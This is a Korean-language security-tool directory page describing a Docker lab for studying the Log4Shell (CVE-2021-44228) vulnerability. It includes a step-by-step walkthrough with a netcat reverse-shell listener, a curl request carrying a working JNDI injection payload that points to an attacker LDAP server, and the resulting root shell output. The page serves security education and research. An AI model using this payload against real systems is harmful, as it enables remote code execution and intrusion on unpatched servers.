Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
mi-laboratorio-log4shell — Log4Shell 취약점(CVE-2021-44228)을 감사하고 연구하기 위한 Docker 기반의 Plug & Play 자동화 실험실 | Kitploit
도구/GitHubGitHub/mafo-sec/mi-laboratorio-log4shell
Container SecurityVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubmafo-sec/mi-laboratorio-log4shell

mi-laboratorio-log4shell

Log4Shell 취약점(CVE-2021-44228)을 감사하고 연구하기 위한 Docker 기반의 Plug & Play 자동화 실험실

저장소 보기
23개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

🚀 자동화된 Log4Shell (CVE-2021-44228) 플레이 앤 플러그 연구실

자동화된 단일 명령 보안 연구실로, Log4Shell (CVE-2021-44228) 원격 코드 실행(RCE) 취약점을 시연하고 감사하도록 설계되었습니다.

이 프로젝트는 Docker Compose를 사용하여 필요한 모든 구성 요소(취약한 애플리케이션, 악성 LDAP 리퍼러 서버, 공격자 도구)를 통합된 격리된 네트워크 인프라로 통합합니다.


⚙️ 주요 기능

  • 100% 플러그 앤 플레이: 수동 IP 구성, .env 파일 편집 또는 네트워크 정렬이 필요하지 않습니다. 모든 것이 Docker 내부 DNS를 통해 자동으로 해결됩니다.
  • 바이트코드 호환성: 익스플로잇 코드는 피해자의 구형 JVM(Java Virtual Machine) 아키텍처와의 호환성을 강제하도록 자동으로 크로스 컴파일되어 UnsupportedClassVersionError 문제를 제거합니다.
  • 중앙 집중식 배포: 단일 오케스트레이션 레이어와 컨테이너 해체, 캐시 정리 및 재빌드를 자동화하는 대화형 Bash 스크립트 관리자(configurar.sh)에 의해 완전히 제어됩니다.

🏗️ 아키텍처 개요

연구실은 세 가지 주요 주체와 함께 격리된 브리지 네트워크(red-log4shell)를 생성합니다:

  1. 피해자 (web-vulnerable): Java 8u111에서 실행되는 완화되지 않은 취약한 버전의 Log4j(2.14.1)를 사용하는 Spring Boot 웹 애플리케이션입니다.
  2. LDAP 서버 (ldap-malicioso): marshalsec으로 구동되어 들어오는 조회 요청을 가로채고 피해자를 공격자의 페이로드로 동적으로 리디렉션합니다.
  3. 공격자 (kali-tools): 컴파일된 익스플로잇 페이로드(Exploit.class)를 전달하는 Python HTTP 서버와 리버스 셸을 잡기 위한 Netcat 리스너를 호스팅하는 사용자 정의 Kali Linux 컨테이너입니다.

⚙️ 빠른 시작

Docker가 설치된 모든 Linux 머신에서 이 연구실을 배포하려면 터미널에서 다음 명령을 실행하십시오:

root@kitploit:~
# 1. Clone the repository
git clone https://github.com/MAFO-sec/mi-laboratorio-log4shell.git

# 2. Navigate to the project directory
cd mi-laboratorio-log4shell

# 3. Grant execution permissions to the script manager and launch the lab
chmod +x configurar.sh
./configurar.sh

🚀 익스플로잇 방법 (단계별)

스크립트를 통해 인프라가 자동으로 가동되고 실행되면 다음 단계에 따라 익스플로잇을 트리거하고 리버스 셸을 캡처합니다.

1단계: Netcat 리스너 설정

호스트 머신(Ubuntu)에서 새 터미널을 열고 공격자 컨테이너에 연결하여 들어오는 연결을 위해 Netcat을 대기 모드로 전환합니다:

root@kitploit:~
sudo docker exec -it kali-tools bash

Kali 컨테이너 내부에서 리스너를 시작합니다:

root@kitploit:~
nc -lvnp 4444

다음 메시지가 표시됩니다: listening on [any] 4444 ...

2단계: 공격 벡터 실행

호스트 머신에서 다른 별도의 터미널을 열고 X-Api-Version 헤더에 포함된 악성 JNDI 인젝션 문자열을 전송합니다:

root@kitploit:~
curl http://localhost:8080/ -H 'X-Api-Version: ${jndi:ldap://ldap-malicioso:1389/Exploit}'

3단계: 리버스 셸 확인

Netcat 터미널로 돌아갑니다. 활성 연결이 표시되어야 합니다. 이제 피해자 서버 내에서 root로 명령을 실행할 수 있습니다:

root@kitploit:~
connect to [172.21.0.4] from (UNKNOWN) [172.21.0.2] 57164
whoami
root

⚠️ 면책 조항

이 리포지토리는 교육 목적, 보안 연구 및 승인된 학술 감사를 위해 엄격하게 생성되었습니다. 인프라 소유자의 명시적인 사전 서면 승인 없이는 이러한 도구를 실행하거나 공격 인프라를 사용하지 마십시오.

도구 다운로드